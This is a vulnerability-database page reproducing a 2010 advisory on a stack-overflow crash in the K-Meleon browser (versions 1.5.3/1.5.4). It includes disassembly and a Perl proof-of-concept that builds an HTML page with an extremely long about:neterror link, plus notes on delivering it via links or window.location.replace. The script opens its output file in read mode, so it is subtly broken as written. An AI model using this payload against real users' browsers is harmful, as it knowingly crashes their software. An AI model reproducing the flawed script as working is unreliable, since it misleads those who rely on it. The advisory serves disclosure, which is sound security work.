Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

K-Meleon For Windows 1.5.3 / 1.5.4 Stack Overflow

🗓️ 06 Aug 2010 00:00:00Reported by LostmonType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

K-Meleon for Windows 1.5.3 / 1.5.4 Stack Overflow DoS Vulnerabilit

Code
`############################################  
K-Meleon for windows about:neterror Stack Overflow DoS  
Vendor URL:http://kmeleon.sourceforge.net/  
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html  
Vendor notified:Yes exploit available: YES  
############################################  
  
K-Meleon is an extremely fast, customizable, lightweight web browser  
based on the Gecko layout engine developed by Mozilla which is also  
used by Firefox. K-Meleon is free, open source software released under  
the GNU General Public License and is designed specifically for  
Microsoft Windows (Win32) operating systems.  
  
K-Meleon is prone vulnerable to crashing with a very long URL...  
Internal web pages like about:neterror does not limit the amount of  
chars that a user put in 'c' 'd' params and them if we compose a  
malformed url the browser can be chash easy.This issue is exploitable  
via web links like <a href="very long url">click here</a> or via  
window.location.replace('very long url') or similar vectors.  
  
#################  
Versions Tested  
#################  
  
I have tested this issue in win xp sp3 and a windows 7 fully pached.  
  
Win XP sp3:  
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )  
K-Meleon 1.6.0a4 Vulnerables.(crashes)  
  
windows 7 Ultimate:  
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)  
K-Meleon 1.6.0a4 Vulnerables.(crashes)  
  
############  
References  
############  
  
Discovered: 29-07-2010  
vendor notify:31-07-2010  
Vendor Response:  
Vendor patch:  
  
########################  
ASM code stack overflow  
########################  
  
ScreenShot => http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png  
  
CPU Disasm  
Address Hex dump Command  
0043CB3F CC INT3  
0043CB40 /$ 3D 00100000 CMP EAX,1000  
0043CB45 |. 73 0E JNB SHORT 0043CB55  
0043CB47 |. F7D8 NEG EAX  
0043CB49 |. 03C4 ADD EAX,ESP  
0043CB4B |. 83C0 04 ADD EAX,4  
0043CB4E |. 8500 TEST DWORD PTR DS:[EAX],EAX  
0043CB50 |. 94 XCHG EAX,ESP  
0043CB51 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]  
0043CB53 |. 50 PUSH EAX  
0043CB54 |. C3 RETN  
0043CB55 |> 51 PUSH ECX  
0043CB56 |. 8D4C24 08 LEA ECX,[ARG.1]  
0043CB5A |> 81E9 00100000 /SUB ECX,1000  
0043CB60 |. 2D 00100000 |SUB EAX,1000  
0043CB65 |. 8501 |TEST DWORD PTR DS:[ECX],EAX <== Stack overflow  
0043CB67 |. 3D 00100000 |CMP EAX,1000  
0043CB6C |.^ 73 EC \JNB SHORT 0043CB5A  
0043CB6E |. 2BC8 SUB ECX,EAX  
0043CB70 |. 8BC4 MOV EAX,ESP  
0043CB72 |. 8501 TEST DWORD PTR DS:[ECX],EAX  
0043CB74 |. 8BE1 MOV ESP,ECX  
0043CB76 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]  
0043CB78 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]  
0043CB7B |. 50 PUSH EAX  
0043CB7C \. C3 RETN  
0043CB7D CC INT3  
0043CB7E CC INT3  
  
  
  
  
################  
#Proof Of Concept  
################  
  
#######################################################################  
#!/usr/bin/perl  
# k-meleon Long "a href" Link DoS  
# Author: Lostmon Lords [email protected] http://lostmon.blogspot.com  
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS  
# generate the file open it with k-keleon click in the link and wait a seconds  
######################################################################  
  
$archivo = $ARGV[0];  
if(!defined($archivo))  
{  
  
print "Usage: $0 <archivo.html>\n";  
  
}  
  
$cabecera = "<html>" . "\n";  
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x  
1028135 . "\">click here if you can :)</a>" . "\n";  
$fin = "</html>";  
  
$datos = $cabecera . $payload . $fin;  
  
open(FILE, '<' . $archivo);  
print FILE $datos;  
close(FILE);  
  
exit;  
  
################## EOF ######################  
  
##############  
Related Links  
##############  
  
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251  
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474  
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776  
  
###################### €nd #############################  
  
Thnx to Phreak for support and let me undestanding the nature of this bug  
thnx to jajoni for test it in windows 7 X64 bits version.  
  
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Aug 2010 00:00Current
0.5Low risk
Vulners AI Score0.5
k-meleonwindowsstack overflowdosvulnerabilitygeckomozillaexploitbrowsersecurityvulnerableweburlcrashwin xpwindows 7asmcodepocbugtracker
28